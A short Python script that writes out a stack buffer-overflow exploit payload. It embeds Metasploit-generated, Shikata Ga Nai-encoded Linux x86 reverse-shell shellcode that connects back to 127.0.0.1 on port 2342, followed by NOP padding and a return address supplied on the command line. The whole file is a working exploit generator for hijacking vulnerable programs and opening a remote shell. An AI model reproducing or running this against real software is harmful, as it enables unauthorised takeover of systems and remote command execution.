#!/usr/bin/python

# linux_ia32_reverse -  LHOST=127.0.0.1 LPORT=2342 Size=97 Encoder=ShikataGaNai http://metasploit.com
shellcode = \
"\xdb\xc2\xd9\x74\x24\xf4\x2b\xc9\xb1\x13\xba\x4f\xf9\xfa\xdd\x5b" + \
"\x31\x53\x17\x03\x53\x17\x83\xa4\x05\x18\x28\x0b\x2d\x8e\x90\x38" + \
"\xbb\x33\x7d\xd8\x63\xbd\x60\xe9\x14\x2e\x3b\x41\x2b\x9c\x3c\xe8" + \
"\x2d\xe7\x66\xb0\xa5\x68\x99\x44\x37\xf1\xf1\x4d\x11\xbe\x67\x1e" + \
"\xd4\xa1\xd8\xc6\xb6\x70\x4a\x8f\xd6\x30\xa1\x0f\x4a\xdf\x16\x20" + \
"\x18\x77\x01\x11\xbc\xee\xbf\xe4\xa3\xa3\x6c\x7f\xc2\xf4\x98\xb2" + \
"\x85"
pad="\x90"

import sys

def hexwert(char):
    if ord(char) < ord('A'):
        wert = int(char)
    else:
        wert = ord(char.upper()) - ord('A') + 10 

    return wert

def hexarray(input):
    ret = []
    
    for i in (0,2,4,6):
        high = hexwert(input[i])
        low  = hexwert(input[i+1])

        stelle = high * 16 + low

        ret.append(stelle)
    return ret 
    
adr   = hexarray(sys.argv[1]) 
#print  ((int(sys.argv[2]) - 2) * pad) + shellcode + (2 * pad) +  ("%s%s%s%s" % (chr(adr[3]), chr(adr[2]), chr(adr[1]), chr(adr[0])))

## write shellcode to stdout
sys.stdout.write(shellcode)

## write padding
sys.stdout.write(int(sys.argv[2]) * pad)

## Write return addresse
sys.stdout.write("%s%s%s%s" % (chr(adr[3]), chr(adr[2]), chr(adr[1]), chr(adr[0])))